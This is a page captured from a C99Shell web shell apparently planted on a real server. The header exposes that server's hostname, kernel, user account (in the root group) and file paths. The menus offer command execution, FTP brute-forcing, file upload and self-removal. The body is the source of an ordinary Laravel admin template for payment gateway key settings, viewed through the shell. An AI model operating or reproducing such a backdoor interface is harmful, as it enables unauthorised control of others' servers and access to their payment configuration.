!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/school.picotech.app/public_html/resources/views/admin/payment_settings/   drwxr-xr-x
Free 29.42 GB of 117.98 GB (24.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     key_settings.blade.php (29.24 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('admin.navigation')

@section('content')

<div class="mainSection-title">
    <div class="row">
        <div class="col-12">
            <div class="d-flex justify-content-between align-items-center">
                <h4>{{ get_phrase('Payment settings') }}</h4>
            </div>
        </div>
    </div>
</div>

<div class="row">
    <div class="col-12">
        <div class="eSection-wrap">
            <div class="title">
                <h3>{{ get_phrase('School Currency') }}</h3>
            </div>
            <div class="eMain">
                <div class="row">
                    <div class="col-md-6 pb-3">
                        <div class="eForm-layouts">
                            <form method="POST" class="col-12 live-class-settings-form" action="{{ route('admin.settings.payment_post') }}" id="live-class-settings-form">
                                @csrf 

                                <div class="fpb-7">
                                    <label for="school_currency" class="eForm-label">{{ get_phrase('School Currency') }}</label>
                                    <select class="form-select eForm-select eChoice-multiple-with-remove" id = "school_currency" name="school_currency" required>
                                        <option value="">{{ get_phrase('select system currency') }}</option>
                                        <?php
                                        
foreach ($currencies as $currency):?>
                                        <option value="{{ $currency['code'] }}"
                                          {{ $school_currency['school_currency'] == $currency['code'] ? 'selected':'' }}> {{ $currency['code'] }}
                                        </option>
                                      <?php endforeach; ?>
                                    </select>
                                </div>

                                <div class="fpb-7">
                                    <label for="currency_position" class="eForm-label">{{ get_phrase('Currency Position') }}</label>
                                    <select class="form-select eForm-select eChoice-multiple-with-remove"  id = "currency_position" name="currency_position" required>
                                        <option value="left" {{ $school_currency['currency_position'] == 'left' ? 'selected':'' }} >{{ get_phrase('left') }}</option>
                                        <option value="right" {{ $school_currency['currency_position'] == 'right' ? 'selected':'' }} >{{ get_phrase('right') }}</option>
                                        <option value="left-space" {{ $school_currency['currency_position'] == 'left-space' ? 'selected':'' }} >{{ get_phrase('left with a space') }}</option>
                                        <option value="right-space" {{ $school_currency['currency_position'] == 'right-space' ? 'selected':'' }} >{{ get_phrase('right with a space') }}</option>
                                      </select>
                                </div>

                                <input type="hidden" id="method" name="method" value="currency">
                                <input type="hidden" id="update_id" name="update_id" value="{{ $school_currency['id'] }}">

                                <div class="fpb-7 pt-2">
                                    <button type="submit" class="btn-form" onclick="">{{ get_phrase('Update Currency') }}</button>
                                </div>

                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>
@if(addon_status('payment_gateways')==1)

<div class="row">
    <div class="col-12">
        <div class="eSection-wrap">
            <div class="title">
                <h3>
                    {{ get_phrase('Paypal settings') }}
                    <!-- <span class="badge bg-success m-1" style="">{{ get_phrase('Addon') }}</span> -->
                </h3>
            </div>
            <div class="eMain">
                <div class="row">
                    <div class="col-md-6 pb-3">
                        <div class="eForm-layouts">
                            <form method="POST" class="col-12 live-class-settings-form" action="{{ route('admin.settings.payment_post') }}" id="live-class-settings-form">
                                @csrf 

                                <div class="fpb-7">
                                    <label for="status" class="eForm-label">{{ get_phrase('Active') }}</label>
                                    <select class="form-select eForm-select eChoice-multiple-with-remove" name="status" id="status">
                                        <option value="1" <?php if ($paypal['status'] == 1): ?> selected <?php endif; ?>>{{ get_phrase('yes') }}</option>
                                        <option value="0" <?php if ($paypal['status'] == 0): ?> selected <?php endif; ?>>{{ get_phrase('no') }}</option>
                                      </select>
                                </div>

                                <div class="fpb-7">
                                    <label for="mode" class="eForm-label">{{ get_phrase('Active') }}</label>
                                    <select class="form-select eForm-select eChoice-multiple-with-remove" name="mode" id="mode">
                                        <option value="live" <?php if ($paypal['mode'] == 'live'): ?> selected <?php endif; ?>>{{ get_phrase('Live') }}</option>
                                        <option value="test" <?php if ($paypal['mode'] == 'test'): ?> selected <?php endif; ?>>{{ get_phrase('Sandbox') }}</option>
                                      </select>
                                </div>

                                <div class="fpb-7">
                                    <label for="test_client_id" class="eForm-label">{{ get_phrase('Client ID (Sandbox)') }}</label>
                                    <input type="text" class="form-control eForm-control" id="test_client_id" name = "test_client_id" placeholder="Sandbox Client Id" value="{{ $paypal_keys->test_client_id }}" aria-label="Sandbox Client Id" required>
                                </div>


                                <div class="fpb-7">
                                    <label for="test_secret_key" class="eForm-label">{{ get_phrase('Client Secrect (Sandbox)') }}</label>
                                    <input type="text" class="form-control eForm-control" id="test_secret_key" name = "test_secret_key" placeholder="Sandbox Secrect Id" value="{{ $paypal_keys->test_secret_key }}" aria-label="Sandbox Secrect Id" required>
                                </div>

                                <div class="fpb-7">
                                    <label for="live_client_id" class="eForm-label">{{ get_phrase('Client ID (Live)') }}</label>
                                    <input type="text" class="form-control eForm-control" id="live_client_id" name = "live_client_id" placeholder="Live Client Id" value="{{ $paypal_keys->live_client_id }}" aria-label="Live Client Id" required>
                                </div>


                                <div class="fpb-7">
                                    <label for="live_secret_key" class="eForm-label">{{ get_phrase('Client Secrect (Live)') }}</label>
                                    <input type="text" class="form-control eForm-control" id="live_secret_key" name = "live_secret_key" placeholder="Live Secrect Id" value="{{ $paypal_keys->live_secret_key }}" aria-label="Live Secrect Id" required>
                                </div>



                                <input type="hidden" id="method" name="method" value="paypal">
                                <input type="hidden" id="update_id" name="update_id" value="{{ $paypal['id'] }}">

                                <div class="fpb-7 pt-2">
                                    <button type="submit" class="btn-form" onclick="">{{ get_phrase('Update Paypal') }}</button>
                                </div>

                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>


<div class="row">
    <div class="col-12">
        <div class="eSection-wrap">
            <div class="title">
                <h3>
                    {{ get_phrase('Stripe settings') }}
                    <!-- <span class="badge bg-success m-1" style="">{{ get_phrase('Addon') }}</span> -->
                </h3>
            </div>
            <div class="eMain">
                <div class="row">
                    <div class="col-md-6 pb-3">
                        <div class="eForm-layouts">
                            <form method="POST" class="col-12 live-class-settings-form" action="{{ route('admin.settings.payment_post') }}" id="live-class-settings-form">
                                @csrf 

                                <div class="fpb-7">
                                    <label for="status" class="eForm-label">{{ get_phrase('Active') }}</label>
                                    <select class="form-select eForm-select eChoice-multiple-with-remove" name="status" id="status">
                                        <option value="1" <?php if ($stripe['status'] == 1): ?> selected <?php endif; ?>>{{ get_phrase('yes') }}</option>
                                        <option value="0" <?php if ($stripe['status'] == 0): ?> selected <?php endif; ?>>{{ get_phrase('no') }}</option>
                                      </select>
                                </div>

                                <div class="fpb-7">
                                    <label for="mode" class="eForm-label">{{ get_phrase('Active') }}</label>
                                    <select class="form-select eForm-select eChoice-multiple-with-remove" name="mode" id="mode">
                                        <option value="live" <?php if ($stripe['mode'] == 'live'): ?> selected <?php endif; ?>>{{ get_phrase('Live') }}</option>
                                        <option value="test" <?php if ($stripe['mode'] == 'test'): ?> selected <?php endif; ?>>{{ get_phrase('Test') }}</option>
                                      </select>
                                </div>

                                <div class="fpb-7">
                                    <label for="test_key" class="eForm-label">{{ get_phrase('Test Public Key') }}</label>
                                    <input type="text" class="form-control eForm-control" id="test_key" name = "test_key" placeholder="Test Public Key" value="{{$stripe_keys->test_key }}" aria-label="Test Public Key" required>
                                </div>


                                <div class="fpb-7">
                                    <label for="test_secret_key" class="eForm-label">{{ get_phrase('Test Sectect Key') }}</label>
                                    <input type="text" class="form-control eForm-control" id="test_secret_key" name = "test_secret_key" placeholder="Test Sectect Key" value="{{ $stripe_keys->test_secret_key }}" aria-label="Test Sectect Key" required>
                                </div>

                                <div class="fpb-7">
                                    <label for="public_live_key" class="eForm-label">{{ get_phrase('Live Public Key') }}</label>
                                    <input type="text" class="form-control eForm-control" id="public_live_key" name = "public_live_key" placeholder="Live Public Key" value="{{ $stripe_keys->public_live_key }}" aria-label="Live Public Key" required>
                                </div>


                                <div class="fpb-7">
                                    <label for="secret_live_key" class="eForm-label">{{ get_phrase('Live Secrect Key') }}</label>
                                    <input type="text" class="form-control eForm-control" id="secret_live_key" name = "secret_live_key" placeholder="Live Secrect Key" value="{{ $stripe_keys->secret_live_key }}" aria-label="Live Secrect Key" required>
                                </div>

                                <input type="hidden" id="method" name="method" value="stripe">
                                <input type="hidden" id="update_id" name="update_id" value="{{ $stripe['id'] }}">



                                <div class="fpb-7 pt-2">
                                    <button type="submit" class="btn-form" onclick="">{{ get_phrase('Update Stripe ') }}</button>
                                </div>

                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<div class="row">
    <div class="col-12">
        <div class="eSection-wrap">
            <div class="title">
                <h3>
                    {{ get_phrase('Razorpay settings') }}
                    <!-- <span class="badge bg-success m-1" style="">{{ get_phrase('Addon') }}</span> -->
                </h3>
            </div>
            <div class="eMain">
                <div class="row">
                    <div class="col-md-6 pb-3">
                        <div class="eForm-layouts">
                            <form method="POST" class="col-12 live-class-settings-form" action="{{ route('admin.settings.payment_post') }}" id="live-class-settings-form">
                                @csrf 

                                <div class="fpb-7">
                                    <label for="status" class="eForm-label">{{ get_phrase('Active') }}</label>
                                    <select class="form-select eForm-select eChoice-multiple-with-remove" name="status" id="status">
                                        <option value="1" <?php if ($razorpay['status'] == 1): ?> selected <?php endif; ?>>{{ get_phrase('yes') }}</option>
                                        <option value="0" <?php if ($razorpay['status'] == 0): ?> selected <?php endif; ?>>{{ get_phrase('no') }}</option>
                                      </select>
                                </div>

                                <div class="fpb-7">
                                    <label for="mode" class="eForm-label">{{ get_phrase('Active') }}</label>
                                    <select class="form-select eForm-select eChoice-multiple-with-remove" name="mode" id="mode">
                                        <option value="live" <?php if ($razorpay['mode'] == 'live'): ?> selected <?php endif; ?>>{{ get_phrase('Live') }}</option>
                                        <option value="test" <?php if ($razorpay['mode'] == 'test'): ?> selected <?php endif; ?>>{{ get_phrase('Test') }}</option>
                                      </select>
                                </div>

                                <div class="fpb-7">
                                    <label for="test_key" class="eForm-label">{{ get_phrase('Test Public Key') }}</label>
                                    <input type="text" class="form-control eForm-control" id="test_key" name = "test_key" placeholder="Test Public Key" value="{{$razorpay_keys->test_key }}" aria-label="Test Public Key" required>
                                </div>


                                <div class="fpb-7">
                                    <label for="test_secret_key" class="eForm-label">{{ get_phrase('Test Sectect Key') }}</label>
                                    <input type="text" class="form-control eForm-control" id="test_secret_key" name = "test_secret_key" placeholder="Test Sectect Key" value="{{ $razorpay_keys->test_secret_key }}" aria-label="Test Sectect Key" required>
                                </div>

                                <div class="fpb-7">
                                    <label for="live_key" class="eForm-label">{{ get_phrase('Live Public Key') }}</label>
                                    <input type="text" class="form-control eForm-control" id="live_key" name = "live_key" placeholder="Live Public Key" value="{{ $razorpay_keys->live_key }}" aria-label="Live Public Key" required>
                                </div>


                                <div class="fpb-7">
                                    <label for="live_secret_key" class="eForm-label">{{ get_phrase('Live Secrect Key') }}</label>
                                    <input type="text" class="form-control eForm-control" id="live_secret_key" name = "live_secret_key" placeholder="Live Secrect Key" value="{{ $razorpay_keys->live_secret_key }}" aria-label="Live Secrect Key" required>
                                </div>

                                <div class="fpb-7">
                                    <label for="theme_color" class="eForm-label">{{ get_phrase('Theme Color') }}</label>
                                    <input type="color" class="form-control eForm-control" id="theme_color" name = "theme_color" placeholder="Live Secrect Key" value="{{ $razorpay_keys->theme_color }}" aria-label="Live Secrect Key" required>
                                </div>


                                <input type="hidden" id="method" name="method" value="razorpay">
                                <input type="hidden" id="update_id" name="update_id" value="{{ $razorpay['id'] }}">

                                <div class="fpb-7 pt-2">
                                    <button type="submit" class="btn-form" onclick="">{{ get_phrase('Update razorpay ') }}</button>
                                </div>

                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<div class="row">
    <div class="col-12">
        <div class="eSection-wrap">
            <div class="title">
                <h3>
                    {{ get_phrase('Paytm settings') }}
                    <!-- <span class="badge bg-success m-1" style="">{{ get_phrase('Addon') }}</span> -->
                </h3>
            </div>
            <div class="eMain">
                <div class="row">
                    <div class="col-md-6 pb-3">
                        <div class="eForm-layouts">
                            <form method="POST" class="col-12 live-class-settings-form" action="{{ route('admin.settings.payment_post') }}" id="live-class-settings-form">
                                @csrf 

                                <div class="fpb-7">
                                    <label for="status" class="eForm-label">{{ get_phrase('Active') }}</label>
                                    <select class="form-select eForm-select eChoice-multiple-with-remove" name="status" id="status">
                                        <option value="1" <?php if ($paytm['status'] == 1): ?> selected <?php endif; ?>>{{ get_phrase('yes') }}</option>
                                        <option value="0" <?php if ($paytm['status'] == 0): ?> selected <?php endif; ?>>{{ get_phrase('no') }}</option>
                                      </select>
                                </div>

                                <div class="fpb-7">
                                    <label for="mode" class="eForm-label">{{ get_phrase('Active') }}</label>
                                    <select class="form-select eForm-select eChoice-multiple-with-remove" name="mode" id="mode">
                                        <option value="live" <?php if ($paytm['mode'] == 'live'): ?> selected <?php endif; ?>>{{ get_phrase('Live') }}</option>
                                        <option value="test" <?php if ($paytm['mode'] == 'test'): ?> selected <?php endif; ?>>{{ get_phrase('Test') }}</option>
                                      </select>
                                </div>

                                <div class="fpb-7">
                                    <label for="test_merchant_id" class="eForm-label">{{ get_phrase('Test Merchant Id') }}</label>
                                    <input type="text" class="form-control eForm-control" id="test_merchant_id" name = "test_merchant_id" placeholder="Test Merchant Id" value="{{$paytm_keys->test_merchant_id }}" aria-label="Test Merchant Id" required>
                                </div>


                                <div class="fpb-7">
                                    <label for="test_merchant_key" class="eForm-label">{{ get_phrase('Test Merchant Key') }}</label>
                                    <input type="text" class="form-control eForm-control" id="test_merchant_key" name = "test_merchant_key" placeholder="Test Merchant Key" value="{{ $paytm_keys->test_merchant_key }}" aria-label="Test Merchant Key" required>
                                </div>

                                <div class="fpb-7">
                                    <label for="live_merchant_id" class="eForm-label">{{ get_phrase('Live Merchant Id') }}</label>
                                    <input type="text" class="form-control eForm-control" id="live_merchant_id" name = "live_merchant_id" placeholder="Live Merchant Id" value="{{ $paytm_keys->live_merchant_id }}" aria-label="Live Merchant Id" required>
                                </div>


                                <div class="fpb-7">
                                    <label for="live_merchant_key" class="eForm-label">{{ get_phrase('Live Merchant Key') }}</label>
                                    <input type="text" class="form-control eForm-control" id="live_merchant_key" name = "live_merchant_key" placeholder="Live Merchant Key" value="{{ $paytm_keys->live_merchant_key }}" aria-label="Live Merchant Key" required>
                                </div>

                                <div class="fpb-7">
                                    <label for="environment" class="eForm-label">{{ get_phrase('Environment') }}</label>
                                    <input type="text" class="form-control eForm-control" id="environment" name = "environment" placeholder="Environment" value="{{ $paytm_keys->environment }}" aria-label="Environment" required>
                                </div>

                                <div class="fpb-7">
                                    <label for="merchant_website" class="eForm-label">{{ get_phrase('Merchant_Website') }}</label>
                                    <input type="text" class="form-control eForm-control" id="merchant_website" name = "merchant_website" placeholder="merchant_website" value="{{ $paytm_keys->merchant_website }}" aria-label="Environment" required>
                                </div>

                                <div class="fpb-7">
                                    <label for="industry_type" class="eForm-label">{{ get_phrase('Channel') }}</label>
                                    <input type="text" class="form-control eForm-control" id="channel" name = "channel" placeholder="channel" value="{{ $paytm_keys->channel }}" aria-label="Environment" required>
                                </div>

                                <div class="fpb-7">
                                    <label for="industry_type" class="eForm-label">{{ get_phrase('industry_type') }}</label>
                                    <input type="text" class="form-control eForm-control" id="industry_type" name = "industry_type" placeholder="industry_type" value="{{ $paytm_keys->industry_type }}" aria-label="Environment" required>
                                </div>

                                <input type="hidden" id="method" name="method" value="paytm">
                                <input type="hidden" id="update_id" name="update_id" value="{{ $paytm['id'] }}">



                                <div class="fpb-7 pt-2">
                                    <button type="submit" class="btn-form" onclick="">{{ get_phrase('Update Paytm ') }}</button>
                                </div>

                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>


<div class="row">
    <div class="col-12">
        <div class="eSection-wrap">
            <div class="title">
                <h3>
                    {{ get_phrase('Paystack settings') }}
                    <!-- <span class="badge bg-success m-1" style="">{{ get_phrase('Addon') }}</span> -->
                </h3>
            </div>
            <div class="eMain">
                <div class="row">
                    <div class="col-md-6 pb-3">
                        <div class="eForm-layouts">
                            <form method="POST" class="col-12 live-class-settings-form"
                                action="{{ route('admin.settings.payment_post') }}" id="live-class-settings-form">
                                @csrf

                                <div class="fpb-7">
                                    <label for="status" class="eForm-label">{{ get_phrase('Active') }}</label>
                                    <select class="form-select eForm-select eChoice-multiple-with-remove"
                                        name="status" id="status">
                                        <option value="1" <?php if ($paystack['status'] == 1): ?> selected <?php endif; ?>>
                                            {{ get_phrase('yes') }}</option>
                                        <option value="0" <?php if ($paystack['status'] == 0): ?> selected <?php endif; ?>>
                                            {{ get_phrase('no') }}</option>
                                    </select>
                                </div>

                                <div class="fpb-7">
                                    <label for="mode" class="eForm-label">{{ get_phrase('Active') }}</label>
                                    <select class="form-select eForm-select eChoice-multiple-with-remove"
                                        name="mode" id="mode">
                                        <option value="live" <?php if ($paystack['mode'] == 'live'): ?> selected <?php endif; ?>>
                                            {{ get_phrase('Live') }}</option>
                                        <option value="test" <?php if ($paystack['mode'] == 'test'): ?> selected <?php endif; ?>>
                                            {{ get_phrase('Test') }}</option>
                                    </select>
                                </div>

                                <div class="fpb-7">
                                    <label for="test_key"
                                        class="eForm-label">{{ get_phrase('Test Public Key') }}</label>
                                    <input type="text" class="form-control eForm-control" id="test_key"
                                        name="test_key" placeholder="Test Public Key"
                                        value="{{ $paystack_keys->test_key }}" aria-label="Test Public Key"
                                        required>
                                </div>


                                <div class="fpb-7">
                                    <label for="test_secret_key"
                                        class="eForm-label">{{ get_phrase('Test Secrect Key') }}</label>
                                    <input type="text" class="form-control eForm-control" id="test_secret_key"
                                        name="test_secret_key" placeholder="Test Secrect Key"
                                        value="{{ $paystack_keys->test_secret_key }}" aria-label="Test Secrect Key"
                                        required>
                                </div>

                                <div class="fpb-7">
                                    <label for="public_live_key"
                                        class="eForm-label">{{ get_phrase('Live Public Key') }}</label>
                                    <input type="text" class="form-control eForm-control" id="public_live_key"
                                        name="public_live_key" placeholder="Live Public Key"
                                        value="{{ $paystack_keys->public_live_key }}"
                                        aria-label="Live Public Key" required>
                                </div>


                                <div class="fpb-7">
                                    <label for="secret_live_key"
                                        class="eForm-label">{{ get_phrase('Live Secrect Key') }}</label>
                                    <input type="text" class="form-control eForm-control" id="secret_live_key"
                                        name="secret_live_key" placeholder="Live Secrect Key"
                                        value="{{ $paystack_keys->secret_live_key }}"
                                        aria-label="Live Secrect Key" required>
                                </div>

                                <input type="hidden" id="method" name="method" value="paystack">
                                <input type="hidden" id="update_id" name="update_id"
                                    value="{{ $paystack['id'] }}">



                                <div class="fpb-7 pt-2">
                                    <button type="submit" class="btn-form"
                                        onclick="">{{ get_phrase('Update Paystack ') }}</button>
                                </div>

                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

@endif



@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0051 ]--